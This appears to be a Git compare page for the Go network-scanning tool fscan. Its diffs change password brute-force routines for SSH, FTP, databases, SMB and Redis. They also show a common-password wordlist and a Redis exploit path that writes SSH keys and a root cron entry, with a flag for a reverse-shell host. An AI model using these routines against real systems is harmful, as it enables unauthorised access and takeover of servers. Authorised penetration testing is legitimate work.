mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-02-09 18:29:17 +08:00
Compare commits
5 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
1a8b884d63 | ||
|
|
468c2a0ff9 | ||
|
|
f8285de94d | ||
|
|
8dc8b6e652 | ||
|
|
a1900086d6 |
@@ -14,39 +14,5 @@ var PluginList = map[string]interface{}{
|
||||
"27017":MongodbScan,
|
||||
"1000001": MS17010,
|
||||
"1000002": SmbGhost,
|
||||
//"WebTitle":WebTitle,
|
||||
"1000003":WebTitle,
|
||||
}
|
||||
|
||||
//var Passwords = []string{"admin123A","123456","admin","root","password","123123","123","1","{user}","{user}{user}","{user}1","{user}123","{user}2016","{user}2015","{user}!","","P@ssw0rd!!","qwa123","12345678","test","123qwe!@#","123456789","123321","1314520","666666","woaini","fuckyou","000000","1234567890","8888888","qwerty","1qaz2wsx","abc123","abc123456","1q2w3e4r","123qwe","p@ssw0rd","p@55w0rd","password!","p@ssw0rd!","password1","r00t","tomcat","apache","system","huawei","admin123","zte"}
|
||||
//const Username = "admin"
|
||||
//const Password = "123456"
|
||||
//const Timeout = 3 * time.Second
|
||||
//const FTPPORT = 21
|
||||
//const SSHPORT = 22
|
||||
//const MEMCACHEDPORT = 11211
|
||||
//const MONGODBPORT = 27017
|
||||
//const MSSQLPORT = 1433
|
||||
//const OraclePORT = 1433
|
||||
//const PSQLPORT = 5432
|
||||
//const REDISPORT = 6379
|
||||
//const MYSQLPORT = 3306
|
||||
//const SMBPORT = 445
|
||||
//const POSTGRESPORT = 5432
|
||||
|
||||
|
||||
//var PluginList = map[string]interface{}{
|
||||
// "ftp": FtpScan,
|
||||
// "mysql": MysqlScan,
|
||||
// //"mongodb":MgoConn,
|
||||
// "mssql":MssqlScan,
|
||||
// "redis": RedisScan,
|
||||
// //"smb": SmbScan,
|
||||
// "ssh": SshScan,
|
||||
// //"portscan": PortConn,
|
||||
// //"icmp": IcmpConn,
|
||||
// "postgresql": PostgresScan,
|
||||
// //"urlscan":UrlConn,
|
||||
// //"auth":ApacheConn,
|
||||
// //"subdomain":SDConn,
|
||||
// //"memcached":MemConn,
|
||||
//}
|
||||
@@ -51,21 +51,4 @@ func geturl2(info *common.HostInfo) (flag bool,err error) {
|
||||
}
|
||||
}
|
||||
return flag,err
|
||||
|
||||
//fmt.Print("\n")
|
||||
}
|
||||
|
||||
|
||||
//if info.Cookie!=""{
|
||||
// res.Header.Add("Cookie",info.Cookie)
|
||||
//}
|
||||
//if info.Header!=""{
|
||||
// var header = make(map[string]string)
|
||||
// err:=json.Unmarshal([]byte(info.Header),&header)
|
||||
// if err!=nil{
|
||||
// Misc.CheckErr(err)
|
||||
// }
|
||||
// for k,v:=range header{
|
||||
// res.Header.Add(k,v)
|
||||
// }
|
||||
//}
|
||||
@@ -70,7 +70,6 @@ func read(text []byte,host string) {
|
||||
return
|
||||
}
|
||||
result += "\n [->]"+string(host)
|
||||
//result += "\n ["+string(host)+"]"
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
|
||||
@@ -14,7 +14,7 @@ func FtpScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
|
||||
for _,user:=range common.Userdict["ftp"]{
|
||||
for _,pass:=range common.Passwords{
|
||||
pass = strings.Replace(pass, "{user}", string(user), -1)
|
||||
flag,err := FtpConn(info,user,pass,ch,wg)
|
||||
flag,err := FtpConn(info,user,pass)
|
||||
if flag==true && err==nil {
|
||||
break Loop
|
||||
}
|
||||
@@ -24,7 +24,7 @@ func FtpScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
|
||||
<- ch
|
||||
}
|
||||
|
||||
func FtpConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
|
||||
func FtpConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
|
||||
flag = false
|
||||
Host,Port,Username,Password := info.Host, common.PORTList["ftp"],user, pass
|
||||
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v",Host,Port), time.Duration(info.Timeout)*time.Second)
|
||||
|
||||
@@ -71,7 +71,7 @@ func isping(ip string) bool {
|
||||
buffer.Reset()
|
||||
binary.Write(&buffer, binary.BigEndian, icmp)
|
||||
|
||||
Time, _ := time.ParseDuration("2s")
|
||||
Time, _ := time.ParseDuration("3s")
|
||||
conn, err := net.DialTimeout("ip4:icmp", ip, Time)
|
||||
if err != nil {
|
||||
return false
|
||||
@@ -80,7 +80,7 @@ func isping(ip string) bool {
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
conn.SetReadDeadline(time.Now().Add(time.Second * 2))
|
||||
conn.SetReadDeadline(time.Now().Add(time.Second * 3))
|
||||
num, err := conn.Read(recvBuf)
|
||||
if err != nil {
|
||||
return false
|
||||
@@ -115,11 +115,13 @@ func CheckSum(data []byte) uint16 {
|
||||
return uint16(^sum)
|
||||
}
|
||||
|
||||
func IcmpCheck(hostslist []string) {
|
||||
func IcmpCheck(hostslist []string,IcmpThreads int) {
|
||||
var wg sync.WaitGroup
|
||||
mutex := &sync.Mutex{}
|
||||
limiter := make(chan int, IcmpThreads)
|
||||
for _,host :=range hostslist{
|
||||
wg.Add(1)
|
||||
limiter <- 1
|
||||
go func(host string) {
|
||||
defer wg.Done()
|
||||
if isping(host){
|
||||
@@ -127,11 +129,14 @@ func IcmpCheck(hostslist []string) {
|
||||
AliveHosts = append(AliveHosts, host)
|
||||
mutex.Unlock()
|
||||
}
|
||||
<- limiter
|
||||
}(host)
|
||||
|
||||
}
|
||||
wg.Wait()
|
||||
}
|
||||
|
||||
|
||||
func ExecCommandPing(ip string,bsenv string) bool {
|
||||
command := exec.Command(bsenv, "-c", "ping -c 1 -w 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
|
||||
outinfo := bytes.Buffer{}
|
||||
@@ -156,12 +161,6 @@ func PingCMDcheck(hostslist []string,bsenv string) {
|
||||
var wg sync.WaitGroup
|
||||
mutex := &sync.Mutex{}
|
||||
limiter := make(chan struct{}, 40)
|
||||
//aliveHost := make(chan string, 20)
|
||||
//go func() {
|
||||
// for s := range aliveHost {
|
||||
// fmt.Println(s)
|
||||
// }
|
||||
//}()
|
||||
for _,host :=range hostslist{
|
||||
wg.Add(1)
|
||||
limiter <- struct{}{}
|
||||
@@ -177,24 +176,23 @@ func PingCMDcheck(hostslist []string,bsenv string) {
|
||||
}(host)
|
||||
}
|
||||
wg.Wait()
|
||||
//close(aliveHost)
|
||||
}
|
||||
|
||||
func ICMPRun(hostslist []string) []string{
|
||||
func ICMPRun(hostslist []string,IcmpThreads int) []string{
|
||||
var sysinfo SystemInfo
|
||||
sysinfo = GetSys()
|
||||
|
||||
if sysinfo.OS == "windows" {
|
||||
IcmpCheck(hostslist)
|
||||
IcmpCheck(hostslist,IcmpThreads)
|
||||
}else if sysinfo.OS == "linux" {
|
||||
if (sysinfo.Groupid == "0" || sysinfo.Userid == "0" || sysinfo.Username == "root") {
|
||||
IcmpCheck(hostslist)
|
||||
IcmpCheck(hostslist,IcmpThreads)
|
||||
}else {
|
||||
PingCMDcheck(hostslist,"/bin/bash")
|
||||
}
|
||||
}else if sysinfo.OS == "darwin" {
|
||||
if (sysinfo.Groupid == "0" || sysinfo.Userid == "0" || sysinfo.Username == "root") {
|
||||
IcmpCheck(hostslist)
|
||||
IcmpCheck(hostslist,IcmpThreads)
|
||||
}else {
|
||||
PingCMDcheck(hostslist,"/usr/local/bin/bash")
|
||||
}
|
||||
|
||||
@@ -17,8 +17,8 @@ func MssqlScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
|
||||
Loop:
|
||||
for _,user:=range common.Userdict["mssql"]{
|
||||
for _,pass:=range common.Passwords{
|
||||
pass = strings.Replace(pass, "{user}", string(user), -1)
|
||||
flag,err := MssqlConn(info,user,pass,ch,wg)
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
flag,err := MssqlConn(info,user,pass)
|
||||
if flag==true && err==nil {
|
||||
break Loop
|
||||
}
|
||||
@@ -28,7 +28,7 @@ Loop:
|
||||
<- ch
|
||||
}
|
||||
|
||||
func MssqlConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
|
||||
func MssqlConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
|
||||
flag = false
|
||||
Host,Port,Username,Password := info.Host, common.PORTList["mssql"],user, pass
|
||||
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host,Username,Password,Port,time.Duration(info.Timeout)*time.Second)
|
||||
|
||||
@@ -16,8 +16,8 @@ func MysqlScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
|
||||
Loop:
|
||||
for _,user:=range common.Userdict["mysql"]{
|
||||
for _,pass:=range common.Passwords{
|
||||
pass = strings.Replace(pass, "{user}", string(user), -1)
|
||||
flag,err := MysqlConn(info,user,pass,ch,wg)
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
flag,err := MysqlConn(info,user,pass)
|
||||
if flag==true && err==nil {
|
||||
break Loop
|
||||
}
|
||||
@@ -27,7 +27,7 @@ Loop:
|
||||
<- ch
|
||||
}
|
||||
|
||||
func MysqlConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
|
||||
func MysqlConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
|
||||
flag = false
|
||||
Host,Port,Username,Password := info.Host, common.PORTList["mysql"],user, pass
|
||||
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host,Port, "mysql")
|
||||
|
||||
@@ -15,7 +15,7 @@ Loop:
|
||||
for _,user:=range common.Userdict["postgresql"]{
|
||||
for _,pass:=range common.Passwords{
|
||||
pass = strings.Replace(pass, "{user}", string(user), -1)
|
||||
flag,err := PostgresConn(info,user,pass,ch,wg)
|
||||
flag,err := PostgresConn(info,user,pass)
|
||||
if flag==true && err==nil {
|
||||
break Loop
|
||||
}
|
||||
@@ -25,7 +25,7 @@ Loop:
|
||||
<- ch
|
||||
}
|
||||
|
||||
func PostgresConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
|
||||
func PostgresConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
|
||||
flag = false
|
||||
Host,Port,Username,Password := info.Host, common.PORTList["psql"],user, pass
|
||||
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host,Port, "postgres", "disable")
|
||||
|
||||
@@ -22,7 +22,7 @@ func RedisScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
|
||||
Loop:
|
||||
for _,pass:=range common.Passwords{
|
||||
pass = strings.Replace(pass, "{user}", string("redis"), -1)
|
||||
flag,err := RedisConn(info,pass,ch,wg)
|
||||
flag,err := RedisConn(info,pass)
|
||||
if flag==true && err==nil {
|
||||
break Loop
|
||||
}
|
||||
@@ -31,7 +31,7 @@ Loop:
|
||||
<- ch
|
||||
}
|
||||
|
||||
func RedisConn(info *common.HostInfo,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
|
||||
func RedisConn(info *common.HostInfo,pass string)(flag bool,err error){
|
||||
flag = false
|
||||
realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["redis"])
|
||||
conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
|
||||
@@ -41,7 +41,6 @@ func RedisConn(info *common.HostInfo,pass string,ch chan int,wg *sync.WaitGroup)
|
||||
defer conn.Close()
|
||||
conn.Write([]byte(fmt.Sprintf("auth %s\r\n",pass)))
|
||||
reply,err := readreply(conn)
|
||||
//common.LogSuccess(result)
|
||||
if strings.Contains(reply,"+OK"){
|
||||
result := fmt.Sprintf("Redis:%s %s",realhost,pass)
|
||||
common.LogSuccess(result)
|
||||
@@ -82,7 +81,7 @@ func Expoilt(info *common.HostInfo,realhost string,conn net.Conn) {
|
||||
result := fmt.Sprintf("%v SSH public key was written successfully",realhost)
|
||||
common.LogSuccess(result)
|
||||
}else {
|
||||
fmt.Println(realhost,"SSHPUB write failed",text)
|
||||
fmt.Println("Redis:",realhost,"SSHPUB write failed",text)
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -95,7 +94,7 @@ func Expoilt(info *common.HostInfo,realhost string,conn net.Conn) {
|
||||
result := fmt.Sprintf("%v /var/spool/cron/root was written successfully",realhost)
|
||||
common.LogSuccess(result)
|
||||
}else {
|
||||
fmt.Println(realhost,"cron write failed",text)
|
||||
fmt.Println("Redis:",realhost,"cron write failed",text)
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -122,6 +121,7 @@ func writekey(conn net.Conn,filename string) (flag bool,text string) {
|
||||
}
|
||||
}
|
||||
}
|
||||
text = strings.TrimSpace(text)
|
||||
if len(text) > 50{
|
||||
text = text[:50]
|
||||
}
|
||||
@@ -146,10 +146,11 @@ func writecron(conn net.Conn,host string) (flag bool,text string) {
|
||||
text,_ = readreply(conn)
|
||||
if strings.Contains(text,"OK") {
|
||||
flag = true
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}//else {fmt.Println(text)}
|
||||
}//else {fmt.Println(text)}
|
||||
}//else {fmt.Println(text)}
|
||||
}//else {fmt.Println(text)}
|
||||
text = strings.TrimSpace(text)
|
||||
if len(text) > 50{
|
||||
text = text[:50]
|
||||
}
|
||||
@@ -164,10 +165,8 @@ func Readfile(filename string)(string,error){
|
||||
}
|
||||
defer file.Close()
|
||||
scanner := bufio.NewScanner(file)
|
||||
//scanner.Split(bufio.ScanLines)
|
||||
for scanner.Scan() {
|
||||
//text := strings.TrimSpace(scanner.Text())
|
||||
text := scanner.Text()
|
||||
text := strings.TrimSpace(scanner.Text())
|
||||
if text != "" {
|
||||
return text,nil
|
||||
}
|
||||
|
||||
@@ -15,7 +15,6 @@ func scan_func(m map[string]interface{}, name string, infos ...interface{}) (res
|
||||
err = errors.New("The number of infos is not adapted.")
|
||||
if err != nil {
|
||||
fmt.Println(err.Error())
|
||||
// //os.Exit(0)
|
||||
}
|
||||
}
|
||||
in := make([]reflect.Value, len(infos))
|
||||
@@ -34,17 +33,18 @@ func IsContain(items []string, item string) bool {
|
||||
return false
|
||||
}
|
||||
|
||||
func Scan(info *common.HostInfo) {
|
||||
func Scan(info common.HostInfo) {
|
||||
fmt.Println("scan start")
|
||||
Hosts,_ := common.ParseIP(info.Host,info.HostFile)
|
||||
if info.Isping == false{
|
||||
Hosts = ICMPRun(Hosts)
|
||||
Hosts = ICMPRun(Hosts,info.IcmpThreads)
|
||||
}
|
||||
_,AlivePorts := TCPportScan(Hosts,info.Ports,"icmp",3) //return AliveHosts,AlivePorts
|
||||
var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"}
|
||||
var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
|
||||
for _,port:=range common.PORTList{
|
||||
severports = append(severports,strconv.Itoa(port))
|
||||
}
|
||||
severports1 := []string{"1521"}
|
||||
severports1 := []string{"1521"} //no scan these service
|
||||
var ch = make(chan int,info.Threads)
|
||||
var wg = sync.WaitGroup{}
|
||||
var scantype string
|
||||
@@ -53,23 +53,19 @@ func Scan(info *common.HostInfo) {
|
||||
info.Host = scan_ip
|
||||
if info.Scantype == "all"{
|
||||
if IsContain(severports,scan_port){
|
||||
//scantype = scan_port
|
||||
AddScan(scan_port,info,ch,&wg)
|
||||
}else {
|
||||
if !IsContain(severports1,scan_port){
|
||||
info.Url = fmt.Sprintf("http://%s",targetIP)
|
||||
wg.Add(1)
|
||||
go WebTitle(info,ch,&wg) //go scan_func(PluginList,"WebTitle",info,ch,&wg)
|
||||
ch <- 1
|
||||
info.Ports = scan_port
|
||||
AddScan("1000003",info,ch,&wg) //webtitle
|
||||
}
|
||||
}
|
||||
if scan_port == "445"{
|
||||
if scan_port == "445"{ //scan more vul
|
||||
AddScan("1000001",info,ch,&wg)
|
||||
AddScan("1000002",info,ch,&wg)
|
||||
}
|
||||
|
||||
}else {
|
||||
port,_:=common.PORTList[info.Scantype]
|
||||
port,_:=common.PORTList_bak[info.Scantype]
|
||||
scantype = strconv.Itoa(port)
|
||||
AddScan(scantype,info,ch,&wg)
|
||||
}
|
||||
@@ -77,8 +73,9 @@ func Scan(info *common.HostInfo) {
|
||||
wg.Wait()
|
||||
}
|
||||
|
||||
func AddScan(scantype string,info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
|
||||
func AddScan(scantype string,info common.HostInfo,ch chan int,wg *sync.WaitGroup) {
|
||||
wg.Add(1)
|
||||
go scan_func(PluginList,scantype,info,ch,wg)
|
||||
if info.Scantype == "webtitle"{scantype = "1000003"}
|
||||
go scan_func(PluginList,scantype,&info,ch,wg)
|
||||
ch <- 1
|
||||
}
|
||||
@@ -15,9 +15,7 @@ Loop:
|
||||
for _,user:=range common.Userdict["smb"]{
|
||||
for _,pass:=range common.Passwords{
|
||||
pass = strings.Replace(pass, "{user}", string(user), -1)
|
||||
//flag,err := SmblConn(info,user,pass)
|
||||
flag,err := doWithTimeOut(info,user,pass)
|
||||
//fmt.Println(user,pass,flag,err)
|
||||
if flag==true && err==nil {
|
||||
break Loop
|
||||
}
|
||||
@@ -38,12 +36,10 @@ func SmblConn(info *common.HostInfo,user string,pass string)(flag bool,err error
|
||||
Password: Password,
|
||||
Domain: "",
|
||||
Workstation: "",
|
||||
Timeout: info.Timeout,
|
||||
|
||||
}
|
||||
|
||||
session, err := smb.NewSession(options, false)
|
||||
//fmt.Println(err)
|
||||
if err == nil {
|
||||
defer session.Close()
|
||||
if session.IsAuthenticated {
|
||||
@@ -57,7 +53,6 @@ func SmblConn(info *common.HostInfo,user string,pass string)(flag bool,err error
|
||||
|
||||
func doWithTimeOut(info *common.HostInfo,user string,pass string)(flag bool,err error){
|
||||
ctx,cancel := context.WithTimeout(context.Background(),time.Duration(info.Timeout)*time.Second)
|
||||
//ctx,cancel := context.WithTimeout(context.Background(),1*time.Second)
|
||||
defer cancel()
|
||||
signal := make(chan int,1)
|
||||
go func() {
|
||||
|
||||
@@ -10,18 +10,11 @@ import (
|
||||
"time"
|
||||
)
|
||||
func SshScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
|
||||
//SshConn(info,"oracle","oracle",ch,wg)
|
||||
Loop:
|
||||
for _,user:=range common.Userdict["ssh"]{
|
||||
for _,pass:=range common.Passwords{
|
||||
pass = strings.Replace(pass, "{user}", string(user), -1)
|
||||
//wg.Add(1)
|
||||
//var good bool
|
||||
//go SshConn(info,user,pass,ch,wg)
|
||||
//if good == true{
|
||||
// break Loop
|
||||
//}
|
||||
flag,err := SshConn(info,user,pass,ch,wg)
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
flag,err := SshConn(info,user,pass)
|
||||
if flag==true && err==nil {
|
||||
break Loop
|
||||
}
|
||||
@@ -31,10 +24,9 @@ Loop:
|
||||
<- ch
|
||||
}
|
||||
|
||||
func SshConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
|
||||
func SshConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
|
||||
flag = false
|
||||
Host,Port,Username,Password := info.Host, common.PORTList["ssh"],user, pass
|
||||
//fmt.Println(Host,Port,Username,Password)
|
||||
config := &ssh.ClientConfig{
|
||||
User: Username,
|
||||
Auth: []ssh.AuthMethod{
|
||||
@@ -50,7 +42,7 @@ func SshConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.
|
||||
if err == nil {
|
||||
defer client.Close()
|
||||
session, err := client.NewSession()
|
||||
if err == nil { //if err == nil && errRet == nil {
|
||||
if err == nil {
|
||||
defer session.Close()
|
||||
flag = true
|
||||
if info.Command != ""{
|
||||
|
||||
@@ -12,6 +12,7 @@ import (
|
||||
)
|
||||
|
||||
func WebTitle(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) (err error, result string) {
|
||||
info.Url = fmt.Sprintf("http://%s:%s",info.Host,info.Ports)
|
||||
err,result = geturl(info)
|
||||
wg.Done()
|
||||
<-ch
|
||||
@@ -55,8 +56,6 @@ func geturl(info *common.HostInfo) (err error, result string) {
|
||||
}
|
||||
}
|
||||
return err, ""
|
||||
|
||||
//fmt.Print("\n")
|
||||
}
|
||||
//var client = &http.Client{
|
||||
// Transport:&http.Transport{
|
||||
|
||||
12
README.md
12
README.md
@@ -13,6 +13,9 @@
|
||||
答:
|
||||
因为用习惯了f-scrack,习惯一条命令跑完所有模块,省去一个个模块单独调用的时间,当然我附加了-m 指定模块的功能。
|
||||
|
||||
## 最近更新
|
||||
[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认3000,适合扫B段
|
||||
[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理
|
||||
|
||||
## usege
|
||||
简单用法
|
||||
@@ -41,6 +44,8 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
|
||||
IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
|
||||
-hf string
|
||||
host file, -hs ip.txt
|
||||
-it int
|
||||
Icmp Threads nums (default 3000)
|
||||
-m string
|
||||
Select scan type ,as: -m ssh (default "all")
|
||||
-no
|
||||
@@ -60,7 +65,7 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
|
||||
-rs string
|
||||
redis shell to write cron file (as: -rs 192.168.1.1:6666)
|
||||
-t int
|
||||
Thread nums (default 100)
|
||||
Thread nums (default 200)
|
||||
-time int
|
||||
Set timeout (default 3)
|
||||
-user string
|
||||
@@ -84,11 +89,8 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
|
||||
|
||||
|
||||
|
||||
## 最近更新
|
||||
2020/11/15
|
||||
[+] 支持ip以文件导入,-hs ip.txt
|
||||
|
||||
## 未来计划
|
||||
[*] 合理输出当前扫描进度
|
||||
[*] 增加内网常见高危漏洞
|
||||
[*] 增加高危web漏洞扫描
|
||||
[*] 师傅们觉得有必要加的漏洞,也可以提issue
|
||||
|
||||
@@ -25,10 +25,28 @@ var PORTList = map[string]int{
|
||||
"smb": 445,
|
||||
"ms17010": 1000001,
|
||||
"cve20200796":1000002,
|
||||
"webtitle": 1000003,
|
||||
"elastic": 9200,
|
||||
"findnet": 135,
|
||||
"all":0,
|
||||
}
|
||||
|
||||
var PORTList_bak = map[string]int{
|
||||
"ftp": 21,
|
||||
"ssh": 22,
|
||||
"mem": 11211,
|
||||
"mgo": 27017,
|
||||
"mssql": 1433,
|
||||
"psql": 5432,
|
||||
"redis": 6379,
|
||||
"mysql": 3306,
|
||||
"smb": 445,
|
||||
"ms17010": 1000001,
|
||||
"cve20200796":1000002,
|
||||
"webtitle": 1000003,
|
||||
"elastic": 9200,
|
||||
"findnet": 135,
|
||||
"all":0,
|
||||
//"wenscan": 17010,
|
||||
}
|
||||
|
||||
var Outputfile = "result.txt"
|
||||
@@ -46,6 +64,7 @@ type HostInfo struct {
|
||||
Scantype string
|
||||
Isping bool
|
||||
Threads int
|
||||
IcmpThreads int
|
||||
Command string
|
||||
Username string
|
||||
Password string
|
||||
@@ -60,49 +79,3 @@ type HostInfo struct {
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
//var Passwords = []string{"admin123A","123456","admin","root","password","123123","123","1","{user}","{user}{user}","{user}1","{user}123","{user}2016","{user}2015","{user}!","","P@ssw0rd!!","qwa123","12345678","test","123qwe!@#","123456789","123321","1314520","666666","woaini","fuckyou","000000","1234567890","8888888","qwerty","1qaz2wsx","abc123","abc123456","1q2w3e4r","123qwe","p@ssw0rd","p@55w0rd","password!","p@ssw0rd!","password1","r00t","tomcat","apache","system","huawei","admin123","zte"}
|
||||
//const Username = "admin"
|
||||
//const Password = "123456"
|
||||
//const Timeout = 3 * time.Second
|
||||
//const FTPPORT = 21
|
||||
//const SSHPORT = 22
|
||||
//const MEMCACHEDPORT = 11211
|
||||
//const MONGODBPORT = 27017
|
||||
//const MSSQLPORT = 1433
|
||||
//const OraclePORT = 1433
|
||||
//const PSQLPORT = 5432
|
||||
//const REDISPORT = 6379
|
||||
//const MYSQLPORT = 3306
|
||||
//const SMBPORT = 445
|
||||
//const POSTGRESPORT = 5432
|
||||
|
||||
//var Userdict = map[string][]string{
|
||||
// "ftp": []string{"www","admin","root","db","wwwroot","data","web","ftp"},
|
||||
// "mysql": []string{"root"},
|
||||
// "mssql": []string{"root","sa"},
|
||||
// "smb": []string{"administrator","guest"},
|
||||
// "postgresql": []string{"postgres","admin"},
|
||||
// "ssh": []string{"root","admin"},
|
||||
// "mongodb": []string{"root","admin"},
|
||||
// //"telnet": []string{"administrator","admin","root","cisco","huawei","zte"},
|
||||
//}
|
||||
|
||||
//var PluginList = map[string]interface{}{
|
||||
// "ftp": FtpScan,
|
||||
// "mysql": MysqlScan,
|
||||
// //"mongodb":MgoConn,
|
||||
// "mssql":MssqlScan,
|
||||
// "redis": RedisScan,
|
||||
// //"smb": SmbScan,
|
||||
// "ssh": SshScan,
|
||||
// //"portscan": PortConn,
|
||||
// //"icmp": IcmpConn,
|
||||
// "postgresql": PostgresScan,
|
||||
// //"urlscan":UrlConn,
|
||||
// //"auth":ApacheConn,
|
||||
// //"subdomain":SDConn,
|
||||
// //"memcached":MemConn,
|
||||
//}
|
||||
@@ -25,7 +25,8 @@ func Flag(Info *HostInfo) {
|
||||
flag.StringVar(&Info.HostFile,"hf","","host file, -hs ip.txt")
|
||||
flag.StringVar(&Info.Ports,"p",DefaultPorts,"Select a port,for example: 22 | 1-65535 | 22,80,3306")
|
||||
flag.StringVar(&Info.Command,"c","","exec command (ssh)")
|
||||
flag.IntVar(&Info.Threads,"t",100,"Thread nums")
|
||||
flag.IntVar(&Info.Threads,"t",200,"Thread nums")
|
||||
flag.IntVar(&Info.IcmpThreads,"it",3000,"Icmp Threads nums")
|
||||
flag.BoolVar(&Info.Isping,"np",false,"not to ping")
|
||||
flag.BoolVar(&Info.IsSave,"no",false,"not to save output log")
|
||||
flag.StringVar(&Info.Username,"user","","username")
|
||||
@@ -36,6 +37,6 @@ func Flag(Info *HostInfo) {
|
||||
flag.Int64Var(&Info.Timeout,"time",3,"Set timeout")
|
||||
flag.StringVar(&Info.Scantype,"m","all","Select scan type ,as: -m ssh")
|
||||
flag.StringVar(&Info.RedisFile,"rf","","redis file to write sshkey file (as: -rf id_rsa.pub) ")
|
||||
flag.StringVar(&Info.RedisFile,"rs","","redis shell to write cron file (as: -rs 192.168.1.1:6666) ")
|
||||
flag.StringVar(&Info.RedisShell,"rs","","redis shell to write cron file (as: -rs 192.168.1.1:6666) ")
|
||||
flag.Parse()
|
||||
}
|
||||
@@ -17,7 +17,7 @@ func LogSuccess(result string){
|
||||
}
|
||||
func WriteFile(result string,filename string) {
|
||||
var text = []byte(result+"\n")
|
||||
fl, err := os.OpenFile(filename, os.O_APPEND|os.O_CREATE, 0777)
|
||||
fl, err := os.OpenFile(filename, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0777)
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
return
|
||||
|
||||
Reference in New Issue
Block a user